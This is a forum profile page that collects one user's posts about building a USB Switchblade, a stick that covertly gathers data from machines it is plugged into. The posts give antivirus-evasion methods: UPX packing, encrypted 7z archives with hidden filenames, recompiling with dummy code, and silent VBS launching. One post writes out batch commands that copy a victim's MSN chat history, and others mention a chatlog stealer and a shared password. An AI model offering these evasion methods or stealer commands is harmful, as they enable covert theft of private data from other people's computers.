Jump to content

Gandalf the l33er

Active Members
  • Content Count

    48
  • Joined

  • Last visited

Everything posted by Gandalf the l33er

  1. You should try to search, and reads some books on computers, or read about it in the internet. You have to have a solid knowledge about computers to understand this fully.
  2. For some reason though, when I do not unhide them, they can still be executed. I think that the only problem when hiding executables is that some programs won't view the files - which is the whole point of hidden files. They should still be able to execute.
  3. I have compressed ALL files in 7zBlade with UPX, and it also prevents AV from detecting the "tools", sometimes even when they are run.
  4. Well...i still prefer .rar,but you know that :p Though i don't think that there are man AV's that will scan .7zip properly,simply because it isn't really a much used format... Yearh i know And even if they scanned, they wouldn't find anything, because even the file _names_ are encrypted. Btw: I could insert DontDetectMeStupidAV in the middle of all filenames to disable AV detection by name :-D
  5. Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.
  6. That's not entirely true. A zipped file with a single layer of encryption still exposes the file names in the archive. If the scanner is set to search for certain file types (vbs, scr, bat) etc, it will delete the file. This is particularly true when sending archives through email. The one way to combat this is to zip the files, encrypt, zip the zip, encrypt. Then the scanner only see the second encrypted zip file. You are right, that problem applies to Zip files. But not to 7z files, especially not when you check the "encrypt filenames" button . If you try to open the image in 7-zip,
  7. Any modern AV monitors _constantly_ for the opening of files - vbs, doc, exe and many more file types - and _before_ they are opened, they are scanned. After they are opened, memory is scanned every x milliseconds to check if any process created a malicious thread or contains a malicious file. So, atm where the AV gets to know the .exe in its definition file, the only thing you can do is to obscurize it with UPX.
  8. You are right v'cent. I've made a new version, it is about 1/5 MB and finishes in 19 seconds. Scroll up to the first post to DL.
  9. Just to clarify: C is used as OOP, but OOP is just a lot more simpler and powerful in C++. Actually, i think C is much more straightforward to learn that C++, think about learning a n00b about operator overloading 8-)
  10. V'cent, sablefoxx is right. The executable will be decrypted into memory at _some_ point, and the AV will grab it. The only other solutions are making a rootkit or recompiling source with different settings/addded dummy code.
  11. It is very hard... i _have_ compressed all the files, but as soon as they are run, the memory image in RAM is the same as if they were not compressed. The only way of making them undetectable is to recompile them with a lot of unused functions (which only exist to change the binary pattern) added. The problem is that many of the apps are commercial or non Open-Source, so recompiling isn't that simple. If they should be hidden for taskmanager is the only _easy_ way to make them services, which also needs recompiling. There is one other possibility: A rootkit. But i am not a H4xX0R, i'm on
  12. Yes of course, why not? Maybe because encrypting changes the bit pattern...
  13. The AV finds viruses by looking at the bit layout... try to modify the applications by packing/unpacking them with upx, http://upx.sourceforge.net/. Open a cmd, cd to the folder containing the files and upx.exe, enter upx -9 * to compress all files as much as possible, or upx -d * to decompress.
  14. Yes, | sends the output of the left-side commando to the right-size commando. A very common use of it is cat largefile.txt | more , which displays the file in "screens", using the utility more.exe. Another way to say it: (taken from http://www.infionline.net/~wtnewton/batch/batguide.html)
  15. Try 7-Zip. http://7-zip.org/. It zips better than many other programs, extracts about all formats, and is free. I've used the command-line version in my project http://forums.hak5.org/index.php/topic,8347.0.html. I strongly recommend it. After installing, just right-click on the file->7-Zip>Extract Here.
  16. Why don't just google it before bothering us with it? try to google autorun.inf or launchu3.exe
  17. He probably modded the CD partition as described in the switchblade thread.. Look around, you'll find it.
  18. It's indeed a very nice package hexlax, mad_props to ya! But, i like to keep it as small as possible, so i will wait till you have made a "light" version, that only kills AV. I've updated my package quite a bit, added msn messenger chatlog stealer and made the whole thing a lot more customizeable. See the first post for details.
  19. I don't think it's possible, if posssible you would have to sort of reflash the sontroller chip...
  20. According to Nirsoft, http://www.nirsoft.net/utils/mspass.html should work with AOL.
  21. I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (coudn't see any elegant way to do it), and then reads the textfile and put the dir in a var. Then it copies the chatlog. Needed file: http://www.myupload.dk/showfile/9418f7520.exe/ Commands: .MsnHistory.exe>msnlogdir.txt Set /P MSNLOG=<msnlogdir.txt del msnlogdir.txt md WIPdump%computername%Chatlog xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog" What do you think? (the little cmdline app is a modded version of some code from so
  22. Ill include http://forums.hak5.org/index.php/topic,8319.0.html as soon as it gets released. I've created a drop with the files at http://drop.io/hak5files. Anybody can add files (hacks and similar) if they wish to. The password is Hak5Rulez.
  23. Dear everybody. . Just finished a version of the USB Switchblade, where all the files are stored in a 7zip file. The password for the file is haxx0r. The advantage is that virus scanners can't find harmfull files inside a encrypted archive, + smaller overall size (around 1 MB). It works no matter where you place it, in any folder on any drive. Files included: Start. vbs: Runs run. bat in "silent" mode, VERY silent, NO black popups are shown Run. bat: Decrypts and extracts the image. 7z using 7z. exe (7-zip command-line version) and runs the specified commands. 7z. exe: 7-zi
×
×
  • Create New...